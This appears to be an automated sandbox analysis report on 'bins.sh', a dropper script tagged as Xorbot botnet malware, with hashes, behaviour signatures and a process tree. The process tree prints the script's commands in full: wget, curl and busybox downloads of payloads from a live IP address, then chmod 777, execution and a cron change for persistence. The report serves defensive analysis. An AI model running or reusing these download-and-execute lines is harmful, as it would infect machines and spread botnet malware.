Analysis
-
max time kernel
149s -
max time network
158s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04/12/2024, 17:31
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
26c147f3c53daa20ad5513d299f09a9b
-
SHA1
dc48cbc8f77f2f2ddc3adfd3f82f7d62f9f63199
-
SHA256
c0f7db59299494b43e471d79920405ed4351ca6dc8d312e8b5b7bef5c588e570
-
SHA512
e5a1accbd6418b2ae9e53a6980a9d178868ae02e44dd84a280e61c8d28aa70ca312b0a17febb36374503716d55ca0b66a5d782caaf13009ddcc0ced11e3a6e78
-
SSDEEP
192:lvxMZOulYwDfXvYwsM8Y6l1ClVPciOumMDfXvYwh8Y6l10I:lvxMZYhM8Y6l1QVPc7y8Y6l1H
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot behavioral2/files/fstream-3.dat family_xorbot -
Xorbot family
-
Contacts a large (1718) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 689 chmod 717 chmod 778 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem 690 nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem /tmp/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI 719 XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI /tmp/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv 780 GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv -
Renames itself 1 IoCs
pid Process 781 GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.b3lVna crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/874/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/972/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/self/auxv curl File opened for reading /proc/41/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/135/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/852/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/870/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/897/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/985/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/996/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/18/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/807/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/843/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/978/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/815/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/938/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/966/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/969/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/149/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/821/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/898/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/994/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/816/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/879/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/917/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/869/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/filesystems crontab File opened for reading /proc/298/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/792/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/895/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/212/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/861/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/880/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/943/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/951/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/959/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/22/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/839/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/868/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/3/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/995/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/867/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/910/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/825/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/907/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/908/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/833/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/872/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/901/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/914/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/982/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/817/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/952/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/887/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/944/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/988/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/998/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/24/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/456/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/796/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/800/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/849/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv File opened for reading /proc/912/cmdline GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem curl File opened for modification /tmp/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI wget File opened for modification /tmp/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI busybox File opened for modification /tmp/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv curl File opened for modification /tmp/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem wget File opened for modification /tmp/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem busybox File opened for modification /tmp/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI curl File opened for modification /tmp/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv wget File opened for modification /tmp/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:658
-
/bin/rm/bin/rm bins.sh2⤵PID:660
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵
- Writes file to tmp directory
PID:665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵
- Writes file to tmp directory
PID:687
-
-
/bin/chmodchmod 777 nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem./nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵
- Executes dropped EXE
PID:690
-
-
/bin/rmrm nYQ1inwQtFvyVBbH2kk56Co1nogI0SPBem2⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵
- Writes file to tmp directory
PID:713
-
-
/bin/chmodchmod 777 XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI./XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵
- Executes dropped EXE
PID:719
-
-
/bin/rmrm XA160n6rARbS8Q7jBHEHHZwWFL92OW1abI2⤵PID:722
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵
- Writes file to tmp directory
PID:723
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵
- Writes file to tmp directory
PID:774
-
-
/bin/chmodchmod 777 GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv./GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:780 -
/bin/shsh -c "crontab -l"3⤵PID:782
-
/usr/bin/crontabcrontab -l4⤵PID:784
-
-
-
/bin/shsh -c "crontab -"3⤵PID:786
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:787
-
-
-
-
/bin/rmrm GISNbozinJyCfmdSPyOBtmuLcBITvdcoFv2⤵PID:789
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uFfupnU5Bsn2H3TFesYEvIe4gPTGUYDLAq2⤵PID:792
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
210B
MD5a221c49075260b0f66e8b972ef25257d
SHA1a48bdb0319d8bf18b776168750f4945bd7cbcd78
SHA2567a335b77f8d593768c94eb1a456a06cb16aa6f888365639f0a99f787badb2fb5
SHA512aa772331e96e0faf5b667c1d660a767fe2c8cfb7b82ad7293951716594dbf25785752f7e58d2d664445339af5bce3854239fff03216d3fbaff5d64e3034d704e